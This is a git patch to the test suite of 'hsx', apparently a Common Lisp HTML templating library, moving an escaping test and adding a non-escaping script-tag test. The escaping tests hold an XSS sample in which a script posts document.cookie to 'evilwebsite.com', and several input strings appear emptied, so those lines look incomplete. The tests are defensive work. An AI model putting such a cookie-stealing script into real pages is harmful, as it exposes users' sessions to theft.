From a6bfe77c1f2aca7b10363c8eef0d3f6e1d8a27c6 Mon Sep 17 00:00:00 2001 From: paku Date: Sun, 2 Jun 2024 14:23:13 +0900 Subject: [PATCH] Improve test --- hsx-test.asd | 2 +- tests/escaper.lisp | 6 +----- tests/renderer.lisp | 13 +++++++++++++ 3 files changed, 15 insertions(+), 6 deletions(-) diff --git a/hsx-test.asd b/hsx-test.asd index 3840f58..1266328 100644 --- a/hsx-test.asd +++ b/hsx-test.asd @@ -15,4 +15,4 @@ (#:escaper-test . #:hsx-test/escaper) (#:renderer-test . #:hsx-test/renderer) (#:group-test . #:hsx-test/group)) - :num-checks 41) + :num-checks 42) diff --git a/tests/escaper.lisp b/tests/escaper.lisp index 540211e..d4ed8de 100644 --- a/tests/escaper.lisp +++ b/tests/escaper.lisp @@ -13,8 +13,4 @@ (test escape-html-text-content (is (string= "&<>"'/`=" - (escape-html-text-content "&<>\"'/`="))) - (is (string= - "<script>fetch('evilwebsite.com', { method: 'POST', body: document.cookie })</script>" - (escape-html-text-content - "" )))) + (escape-html-text-content "&<>\"'/`=")))) diff --git a/tests/renderer.lisp b/tests/renderer.lisp index 9d8fbf0..8723521 100644 --- a/tests/renderer.lisp +++ b/tests/renderer.lisp @@ -63,6 +63,19 @@ (img :src "/background.png") :pretty t)))) +(test escaping-tag + (is (string= #M"
+ \ <script>fetch('evilwebsite.com', { method: 'POST', body: document.cookie })</script> + \
" + (render-to-string + (div "" ) + :pretty t)))) + +(test non-escaping-tag + (is (string= "" + (render-to-string + (script "alert('<< Do not embed user-generated contents here! >>')"))))) + (test fragment (let ((frg (<> (li "bar")